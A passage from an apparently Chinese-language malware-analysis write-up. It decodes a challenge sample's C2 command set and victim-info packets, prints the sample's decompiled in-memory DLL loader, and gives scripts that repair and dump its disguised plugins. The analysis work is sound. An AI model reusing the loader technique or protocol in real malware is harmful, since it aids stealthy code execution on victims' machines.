<span class="n">sys</span><span class="o">.</span><span class="nb">exit</span><span class="p">()</span>
<span class="k">print</span> <span class="s">'Socket bind complete'</span>
<span class="c">#Start listening on socket</span>
<span class="n">s</span><span class="o">.</span><span class="n">listen</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span>
<span class="k">print</span> <span class="s">'Server start at: </span><span class="si">%</span><span class="s">s:</span><span class="si">%</span><span class="s">s'</span> <span class="o">%</span><span class="p">(</span><span class="n">HOST</span><span class="p">,</span> <span class="n">PORT</span><span class="p">)</span>
<span class="k">print</span> <span class="s">'Wait for connection...'</span>
<span class="c"># connect and send data</span>
<span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
<span class="n">conn</span><span class="p">,</span> <span class="n">addr</span> <span class="o">=</span> <span class="n">s</span><span class="o">.</span><span class="n">accept</span><span class="p">()</span>
<span class="k">print</span> <span class="s">'Connected by '</span><span class="p">,</span> <span class="n">addr</span>
<span class="k">while</span> <span class="mi">1</span><span class="p">:</span>
<span class="c">#send</span>
<span class="n">g_data</span> <span class="o">=</span> <span class="n">packet</span><span class="p">(</span><span class="n">conn</span><span class="p">)</span>
<span class="c"># conn.send("32303137aff18141240000005e0000005e00000051298f741667d7ed2941950106f505451c0000004200000042000000f37126ad88a5617eaf06000d424c5a21170417200e000000000000000000000000000000155bbf4a1efe1517734604b9d42b80e8770065006c0063006f006d00650070006100730073003100210031000000".decode("hex"))</span>
</code></pre></div></div>
<h2 id="第三階段-利用預設指令集下載安裝-plugins--processor-default">第三階段: 利用預設指令集下載/安裝 Plugins (Processor default)</h2>
<blockquote>
<p>processor ID = 155bbf4a1efe1517734604b9d42b80e8</p>
</blockquote>
<p>在前面幾個未加密的封包中可以找到一組 ID,<code class="highlighter-rouge">155bbf4a1efe1517734604b9d42b80e8</code> 這裡定義此 ID 為預設的 Processor 功能,因為它代表的是 Client (<code class="highlighter-rouge">secondstage.exe</code>) 的指令集,在 <code class="highlighter-rouge">secondstage.exe</code> 的 <code class="highlighter-rouge">sub_404D60</code> 函數內有各指令的功能。</p>
<h3 id="指令集">指令集</h3>
<table>
<thead>
<tr>
<th>command</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x2</td>
<td>Ping</td>
</tr>
<tr>
<td>0x3</td>
<td>GetComputerInfo</td>
</tr>
<tr>
<td>0x4</td>
<td>ListPlugins</td>
</tr>
<tr>
<td>0x5</td>
<td>StartDownloadPlugin</td>
</tr>
<tr>
<td>0x6</td>
<td>DowloadPlugin</td>
</tr>
<tr>
<td>0x7</td>
<td>InstallPlugin 用 <code class="highlighter-rouge">CreatePluginObj</code> export 來找 plugin object, 並依照 plugin type (<code class="highlighter-rouge">CRPT</code>, <code class="highlighter-rouge">COMP</code>, <code class="highlighter-rouge">CMD</code>)來管理</td>
</tr>
<tr>
<td>0x8</td>
<td>Exit</td>
</tr>
<tr>
<td>0x9</td>
<td>Unused</td>
</tr>
<tr>
<td>0xa</td>
<td>Unused</td>
</tr>
<tr>
<td>0xb</td>
<td>MessageBox</td>
</tr>
<tr>
<td>0xd</td>
<td>ClearDownloadTask</td>
</tr>
<tr>
<td>0xe</td>
<td>Online: 連線至中繼站, 密碼在 config 中</td>
</tr>
</tbody>
</table>
<h3 id="受害電腦的資訊">受害電腦的資訊</h3>
<p>可以透過 <code class="highlighter-rouge">cmd = 0x3</code> 來 取得受害電腦資訊,封包結構如下</p>
<table>
<thead>
<tr>
<th>Offset</th>
<th>Lenght</th>
<th>Context</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x10</td>
<td>0x40</td>
<td>version</td>
</tr>
<tr>
<td>0x50</td>
<td>0x80</td>
<td>computer name</td>
</tr>
<tr>
<td>0xd0</td>
<td>0x80</td>
<td>user name</td>
</tr>
<tr>
<td>0x150</td>
<td>0x200</td>
<td>group name</td>
</tr>
<tr>
<td>0x350</td>
<td>0x1c</td>
<td>others info</td>
</tr>
</tbody>
</table>
<p>封包中還原受害電腦的資訊</p>
<table>
<thead>
<tr>
<th>Computer Info</th>
<th>context</th>
</tr>
</thead>
<tbody>
<tr>
<td>version</td>
<td>2.1.0</td>
</tr>
<tr>
<td>computer name</td>
<td>LARRYJOHNSON-PC</td>
</tr>
<tr>
<td>user name</td>
<td>larry.johnson</td>
</tr>
<tr>
<td>group name</td>
<td>feye2017 srv</td>
</tr>
</tbody>
</table>
<h3 id="plugins-資訊">Plugins 資訊</h3>
<p>透過 <code class="highlighter-rouge">cmd = 0x6</code> 來下載 Plugin,下載時會有一個 Size 為 <code class="highlighter-rouge">0x20</code> 的 Header,Header 會提供下載的資訊,包含下載的 Plugin ID 與 Plugin Type 以及下載該 Plugin 的進度</p>
<table>
<thead>
<tr>
<th>Offset</th>
<th>Length</th>
<th>Contents</th>
<th>Example</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x64</td>
<td>16 bytes</td>
<td>Downloading Plugin’s GUID</td>
<td>c30b1a2dcb489ca8a724376469cf6782 -> rc4</td>
</tr>
<tr>
<td>0x74</td>
<td>4 bytes</td>
<td>type</td>
<td>43525054 -> CRPT</td>
</tr>
<tr>
<td>0x78</td>
<td>4 bytes</td>
<td>offset</td>
<td>002e0100</td>
</tr>
<tr>
<td>0x7c</td>
<td>4 bytes</td>
<td>total size</td>
<td>002e0100</td>
</tr>
<tr>
<td>0x80</td>
<td>4 bytes</td>
<td>chunksize</td>
<td>00400000</td>
</tr>
</tbody>
</table>
<p>Plugin Type 共有三種</p>
<table>
<thead>
<tr>
<th>Type</th>
<th>Contents</th>
<th> </th>
</tr>
</thead>
<tbody>
<tr>
<td>CRPT</td>
<td>Crypto</td>
<td>43525054</td>
</tr>
<tr>
<td>COMP</td>
<td>Compress</td>
<td>434f4d50</td>
</tr>
<tr>
<td>CMD</td>
<td>C2</td>
<td>434d44</td>
</tr>
</tbody>
</table>
<h3 id="還原-plugins">還原 Plugins</h3>
<p>透過 <code class="highlighter-rouge">cmd = 0x7</code> 來安裝 Plugin,可以透過理解程式如何安裝的,來還原 Plugin</p>
<h4 id="安裝步驟">安裝步驟</h4>
<ul>
<li><code class="highlighter-rouge">0x4053A0</code> 實作 <code class="highlighter-rouge">Loadlibrary</code> 並驗證 PE 格式</li>
<li>驗證資料的開頭為 <code class="highlighter-rouge">LM</code></li>
<li>offset <code class="highlighter-rouge">0x3c</code> 通常用於找 <code class="highlighter-rouge">PE</code>,這裡是惡意程式用來找 <code class="highlighter-rouge">NOP</code></li>
<li>驗證 <code class="highlighter-rouge">FileHeader.Machine</code> type 是 <code class="highlighter-rouge">0x3233</code></li>
<li>實做 <code class="highlighter-rouge">LoadLibrary</code>
<ul>
<li>用 <code class="highlighter-rouge">VirtualAlloc</code> 申請一塊大小是 <code class="highlighter-rouge">OptionalHeader.SizeOfImage</code> 的記憶體</li>
<li>將 PE 的每個 section 複製到 VirtualAddress</li>
<li>修正 <code class="highlighter-rouge">.reloc</code> section</li>
<li>處理 Import Table,載入 dll 並解析 import function</li>
</ul>
</li>
<li>將 <code class="highlighter-rouge">OptionalHeader.AddressOfEntryPoint</code> 與 <code class="highlighter-rouge">0xABCDABCD</code> 做 XOR,來取得 dll 的 Entry Point</li>
</ul>
<h4 id="安裝-plugin-的程式碼">安裝 Plugin 的程式碼</h4>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">if</span> <span class="p">(</span> <span class="n">image</span><span class="o">-></span><span class="n">e_magic</span> <span class="o">!=</span> <span class="err">'</span><span class="n">ML</span><span class="err">'</span> <span class="p">)</span> <span class="c1">// MZ
</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">PE</span> <span class="o">=</span> <span class="p">(</span><span class="n">image</span> <span class="o">+</span> <span class="n">image</span><span class="o">-></span><span class="n">e_lfanew</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">PE</span><span class="o">-></span><span class="n">Signature</span> <span class="o">!=</span> <span class="err">'</span><span class="n">PON</span><span class="err">'</span> <span class="p">)</span> <span class="c1">// PE
</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">PE</span><span class="o">-></span><span class="n">FileHeader</span><span class="p">.</span><span class="n">Machine</span> <span class="o">!=</span> <span class="mh">0x3233</span> <span class="p">)</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">base</span> <span class="o">=</span> <span class="n">functions</span><span class="p">.</span><span class="n">VirtualAlloc</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">PE</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">SizeOfImage</span><span class="p">,</span> <span class="n">MEM_COMMIT</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">base</span> <span class="p">)</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">section</span> <span class="o">=</span> <span class="p">(</span><span class="o">&</span><span class="n">PE</span><span class="o">-></span><span class="n">OptionalHeader</span> <span class="o">+</span> <span class="n">PE</span><span class="o">-></span><span class="n">FileHeader</span><span class="p">.</span><span class="n">SizeOfOptionalHeader</span><span class="p">);</span>
<span class="n">functions</span><span class="p">.</span><span class="n">memcpy</span><span class="p">(</span><span class="n">base</span><span class="p">,</span> <span class="n">image</span><span class="p">,</span> <span class="n">PE</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">SizeOfHeaders</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">PE</span><span class="o">-></span><span class="n">FileHeader</span><span class="p">.</span><span class="n">NumberOfSections</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">functions</span><span class="p">.</span><span class="n">memcpy</span><span class="p">(</span><span class="n">base</span> <span class="o">+</span> <span class="n">section</span><span class="o">-></span><span class="n">VirtualAddress</span><span class="p">,</span> <span class="n">image</span> <span class="o">+</span> <span class="n">section</span><span class="o">-></span><span class="n">PointerToRawData</span><span class="p">,</span> <span class="n">section</span><span class="o">-></span><span class="n">SizeOfRawData</span><span class="p">);</span>
<span class="o">++</span><span class="n">section</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">PE</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">DataDirectory</span><span class="p">[</span><span class="n">IMAGE_DIRECTORY_ENTRY_BASERELOC</span><span class="p">].</span><span class="n">VirtualAddress</span>
<span class="o">&&</span> <span class="n">PE</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">DataDirectory</span><span class="p">[</span><span class="n">IMAGE_DIRECTORY_ENTRY_BASERELOC</span><span class="p">].</span><span class="n">Size</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">offset</span> <span class="o">=</span> <span class="n">base</span> <span class="o">-</span> <span class="n">PE</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">ImageBase</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span> <span class="n">rel</span> <span class="o">=</span> <span class="p">(</span><span class="n">base</span> <span class="o">+</span> <span class="n">PE</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">DataDirectory</span><span class="p">[</span><span class="n">IMAGE_DIRECTORY_ENTRY_BASERELOC</span><span class="p">].</span><span class="n">VirtualAddress</span><span class="p">);</span>
<span class="n">rel</span><span class="o">-></span><span class="n">SizeOfBlock</span><span class="p">;</span>
<span class="n">rel</span> <span class="o">=</span> <span class="p">(</span><span class="n">rel</span> <span class="o">+</span> <span class="n">rel</span><span class="o">-></span><span class="n">SizeOfBlock</span><span class="p">)</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">size</span> <span class="o">=</span> <span class="p">(</span><span class="n">rel</span><span class="o">-></span><span class="n">SizeOfBlock</span> <span class="o">-</span> <span class="mi">8</span><span class="p">)</span> <span class="o">>></span> <span class="mi">1</span><span class="p">;</span>
<span class="n">v12</span> <span class="o">=</span> <span class="n">rel</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span> <span class="n">j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">j</span> <span class="o"><</span> <span class="n">size</span><span class="p">;</span> <span class="o">++</span><span class="n">j</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">v6</span> <span class="o">=</span> <span class="n">LOWORD</span><span class="p">(</span><span class="n">v12</span><span class="o">-></span><span class="n">VirtualAddress</span><span class="p">)</span> <span class="o">>></span> <span class="mi">12</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">v6</span> <span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">v6</span> <span class="o">!=</span> <span class="mi">3</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">functions</span><span class="p">.</span><span class="n">VirtualFree</span><span class="p">(</span><span class="n">base</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">MEM_RELEASE</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="o">*</span><span class="p">(</span><span class="n">base</span> <span class="o">+</span> <span class="n">rel</span><span class="o">-></span><span class="n">VirtualAddress</span> <span class="o">+</span> <span class="p">(</span><span class="n">v12</span><span class="o">-></span><span class="n">VirtualAddress</span> <span class="o">&</span> <span class="mh">0xFFF</span><span class="p">))</span> <span class="o">+=</span> <span class="n">offset</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">v12</span> <span class="o">=</span> <span class="p">(</span><span class="n">v12</span> <span class="o">+</span> <span class="mi">2</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">PE</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">DataDirectory</span><span class="p">[</span><span class="n">IMAGE_DIRECTORY_ENTRY_IMPORT</span><span class="p">].</span><span class="n">VirtualAddress</span>
<span class="o">&&</span> <span class="n">PE</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">DataDirectory</span><span class="p">[</span><span class="n">IMAGE_DIRECTORY_ENTRY_IMPORT</span><span class="p">].</span><span class="n">Size</span> <span class="p">)</span>
<span class="p">{</span>
<span class="k">for</span> <span class="p">(</span> <span class="n">entry</span> <span class="o">=</span> <span class="p">(</span><span class="n">base</span> <span class="o">+</span> <span class="n">PE</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">DataDirectory</span><span class="p">[</span><span class="n">IMAGE_DIRECTORY_ENTRY_IMPORT</span><span class="p">].</span><span class="n">VirtualAddress</span><span class="p">);</span>
<span class="n">entry</span><span class="o">-></span><span class="n">Characteristics</span><span class="p">;</span>
<span class="o">++</span><span class="n">entry</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">hModule</span> <span class="o">=</span> <span class="n">functions</span><span class="p">.</span><span class="n">LoadLibraryA</span><span class="p">(</span><span class="n">base</span> <span class="o">+</span> <span class="n">entry</span><span class="o">-></span><span class="n">Name</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">hModule</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">functions</span><span class="p">.</span><span class="n">VirtualFree</span><span class="p">(</span><span class="n">base</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">MEM_RELEASE</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">thunk</span> <span class="o">=</span> <span class="p">(</span><span class="n">base</span> <span class="o">+</span> <span class="n">entry</span><span class="o">-></span><span class="n">FirstThunk</span><span class="p">);</span>
<span class="n">v1</span> <span class="o">=</span> <span class="n">base</span> <span class="o">+</span> <span class="n">entry</span><span class="o">-></span><span class="n">Characteristics</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span> <span class="o">*</span><span class="n">v1</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">import</span> <span class="o">=</span> <span class="o">*</span><span class="n">v1</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span> <span class="o">*</span><span class="n">v1</span> <span class="o">>=</span> <span class="mi">0</span> <span class="p">)</span>
<span class="n">addr</span> <span class="o">=</span> <span class="n">functions</span><span class="p">.</span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">hModule</span><span class="p">,</span> <span class="o">&</span><span class="n">import</span><span class="o">-></span><span class="n">Name</span> <span class="o">+</span> <span class="n">base</span><span class="p">);</span>
<span class="k">else</span>
<span class="n">addr</span> <span class="o">=</span> <span class="n">functions</span><span class="p">.</span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">hModule</span><span class="p">,</span> <span class="n">import</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span> <span class="o">!*&</span><span class="n">addr</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">functions</span><span class="p">.</span><span class="n">VirtualFree</span><span class="p">(</span><span class="n">base</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">MEM_RELEASE</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="o">*</span><span class="n">thunk</span> <span class="o">=</span> <span class="n">addr</span><span class="p">;</span>
<span class="n">v1</span> <span class="o">+=</span> <span class="mi">4</span><span class="p">;</span>
<span class="o">++</span><span class="n">thunk</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span> <span class="p">((</span><span class="n">base</span> <span class="o">+</span> <span class="p">(</span><span class="n">PE</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">AddressOfEntryPoint</span> <span class="o">^</span> <span class="mh">0xABCDABCD</span><span class="p">)))(</span><span class="n">base</span><span class="p">,</span> <span class="n">DLL_PROCESS_ATTACH</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="p">)</span><span class="c1">// DLLMain
</span> <span class="k">return</span> <span class="n">base</span><span class="p">;</span>
<span class="n">functions</span><span class="p">.</span><span class="n">VirtualFree</span><span class="p">(</span><span class="n">base</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">MEM_RELEASE</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</code></pre></div></div>
<h4 id="還原-plugin">還原 Plugin</h4>
<ul>
<li>將前兩個 bytes <code class="highlighter-rouge">LM</code> 替換成 <code class="highlighter-rouge">MZ</code> (找 MZ header)</li>
<li><code class="highlighter-rouge">e_lfanew</code> 則是一個 offset,該 offset 表示PE Header 的偏移位置,它位於PE檔 <code class="highlighter-rouge">0x3C</code> 的位置,所以我們可以透過這個 offset 來找到 PE 檔內的 PE Header,將 <code class="highlighter-rouge">NOP\0</code> 替換成 <code class="highlighter-rouge">PE\0\0</code></li>
<li>用 <code class="highlighter-rouge">IMAGE_FILE_MACHINE_I386</code> (0x014c) 替換 <code class="highlighter-rouge">FileHeader.Machine</code></li>
<li>將 <code class="highlighter-rouge">OptionalHeader.AddressOfEntryPoint</code> 與 <code class="highlighter-rouge">0xABCDABCD</code> 做 XOR,來取得 dll 的 Entry Point</li>
</ul>
<h4 id="還原-plugin-的程式碼">還原 Plugin 的程式碼</h4>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#===========================================</span>
<span class="c"># Usage: python pe.py [InputPE] [OutputPE]</span>
<span class="c">#===========================================</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">struct</span>
<span class="kn">import</span> <span class="nn">binascii</span>
<span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="c"># python pe.py pe pedump</span>
<span class="k">def</span> <span class="nf">ReadFile</span><span class="p">():</span>
<span class="nb">file</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="s">'rb'</span><span class="p">)</span><span class="o">.</span><span class="n">read</span><span class="p">()</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="s">""</span><span class="p">)</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
<span class="k">return</span> <span class="s">''</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="nb">file</span><span class="p">)</span>
<span class="n">ifile</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="s">'rb'</span><span class="p">)</span>
<span class="n">ofile</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="s">'wb'</span><span class="p">)</span>
<span class="c"># MZ header</span>
<span class="k">assert</span> <span class="n">ifile</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> <span class="o">==</span> <span class="s">'LM'</span>
<span class="n">ofile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s">'MZ'</span><span class="p">)</span>
<span class="k">print</span> <span class="s">'MZ header done'</span>
<span class="c"># Write up to e_lfanew</span>
<span class="n">ofile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">ifile</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mh">0x3c</span><span class="o">-</span><span class="mi">2</span><span class="p">))</span>
<span class="n">e_lfanew</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">ifile</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">4</span><span class="p">))</span>
<span class="n">ofile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">p32</span><span class="p">(</span><span class="n">e_lfanew</span><span class="p">))</span>
<span class="n">ofile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">ifile</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="n">e_lfanew</span> <span class="o">-</span> <span class="p">(</span><span class="mh">0x3c</span> <span class="o">+</span> <span class="mi">4</span><span class="p">)))</span>
<span class="c"># PE header</span>
<span class="k">assert</span> <span class="n">ifile</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">4</span><span class="p">)</span> <span class="o">==</span> <span class="s">'NOP</span><span class="se">\0</span><span class="s">'</span>
<span class="n">ofile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s">'PE</span><span class="se">\0\0</span><span class="s">'</span><span class="p">)</span>
<span class="k">print</span> <span class="s">'PE header done'</span>
<span class="c"># Machine</span>
<span class="k">assert</span> <span class="n">ifile</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> <span class="o">==</span> <span class="s">'32'</span> <span class="c">#FileHeader.Machine</span>
<span class="n">ofile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s">'</span><span class="se">\x4c\x01</span><span class="s">'</span><span class="p">)</span> <span class="c">##IMAGE_FILE_MACHINE_I386</span>
<span class="k">print</span> <span class="s">'PE.Machine done'</span>
<span class="n">ofile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">ifile</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mh">0x22</span><span class="p">))</span>
<span class="c"># Make Entrypoint</span>
<span class="n">entrypoint</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">ifile</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">4</span><span class="p">))</span> <span class="o">^</span> <span class="mh">0xabcdabcd</span>
<span class="n">ofile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">p32</span><span class="p">(</span><span class="n">entrypoint</span><span class="p">))</span>
<span class="k">print</span> <span class="s">'Entrypoint done'</span>
<span class="n">ofile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">ifile</span><span class="o">.</span><span class="n">read</span><span class="p">())</span>
<span class="n">ifile</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
<span class="n">ofile</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
<span class="k">print</span> <span class="s">'DLL Done'</span>
</code></pre></div></div>
<h4 id="取得-plugins">取得 Plugins</h4>
<p>可以在解密封包的過程,就將 Plugin 的資料存起來,或是用 Python Socket 把封包傳給 Client,當 Client 下載完後,在 <code class="highlighter-rouge">InstallPlugin</code> 函數中,查看檔案的大小為 <code class="highlighter-rouge">0x113d954</code></p>
<p><img src="https://i.imgur.com/Bw8vEea.png" alt="" /></p>
<p>再用 IDA python 來 dump Plugin</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Python</span><span class="o">></span><span class="nb">file</span> <span class="o">=</span> <span class="n">GetManyBytes</span><span class="p">(</span><span class="mh">0x5ac488</span><span class="p">,</span> <span class="mh">0x34d954</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">open</span><span class="p">(</span><span class="s">"plugin0.dll"</span><span class="p">,</span> <span class="s">"wb"</span><span class="p">)</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="nb">file</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">file</span> <span class="o">=</span> <span class="n">GetManyBytes</span><span class="p">(</span><span class="mh">0x5ac488</span><span class="p">,</span> <span class="mh">0x34d954</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">open</span><span class="p">(</span><span class="s">"plugin1.dll"</span><span class="p">,</span> <span class="s">"wb"</span><span class="p">)</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="nb">file</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">file</span> <span class="o">=</span> <span class="n">GetManyBytes</span><span class="p">(</span><span class="mh">0x5c2238</span><span class="p">,</span> <span class="mh">0x34d954</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">open</span><span class="p">(</span><span class="s">"plugin2.dll"</span><span class="p">,</span> <span class="s">"wb"</span><span class="p">)</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="nb">file</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">file</span> <span class="o">=</span> <span class="n">GetManyBytes</span><span class="p">(</span><span class="mh">0x5c2238</span><span class="p">,</span> <span class="mh">0x34d954</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">open</span><span class="p">(</span><span class="s">"plugin3.dll"</span><span class="p">,</span> <span class="s">"wb"</span><span class="p">)</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="nb">file</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">file</span> <span class="o">=</span> <span class="n">GetManyBytes</span><span class="p">(</span><span class="mh">0x5d9d90</span><span class="p">,</span> <span class="mh">0x34d954</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">open</span><span class="p">(</span><span class="s">"plugin4.dll"</span><span class="p">,</span> <span class="s">"wb"</span><span class="p">)</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="nb">file</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">file</span> <span class="o">=</span> <span class="n">GetManyBytes</span><span class="p">(</span><span class="mh">0x5d9d90</span><span class="p">,</span> <span class="mh">0x34d954</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">open</span><span class="p">(</span><span class="s">"plugin5.dll"</span><span class="p">,</span> <span class="s">"wb"</span><span class="p">)</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="nb">file</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">file</span> <span class="o">=</span> <span class="n">GetManyBytes</span><span class="p">(</span><span class="mh">0x5d9d90</span><span class="p">,</span> <span class="mh">0x34d954</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">open</span><span class="p">(</span><span class="s">"plugin6.dll"</span><span class="p">,</span> <span class="s">"wb"</span><span class="p">)</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="nb">file</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">file</span> <span class="o">=</span> <span class="n">GetManyBytes</span><span class="p">(</span><span class="mh">0x5d9d90</span><span class="p">,</span> <span class="mh">0x34d954</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">open</span><span class="p">(</span><span class="s">"plugin7.dll"</span><span class="p">,</span> <span class="s">"wb"</span><span class="p">)</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="nb">file</span><span class="p">)</span>
</code></pre></div></div>
<p>最後使用上面的 python code 還原 dll 即可</p>
<p><img src="https://i.imgur.com/s8xEGGB.png" alt="" /></p>
<p>在這個階段可以從 <code class="highlighter-rouge">secondstage.exe</code> 可還原出 8 隻 dll</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>r.dll
t.dll
6.dll
x.dll
z.dll
f.dll
s.dll
m.dll
</code></pre></div></div>
<h2 id="第四階段-解析封包結構">第四階段: 解析封包結構</h2>
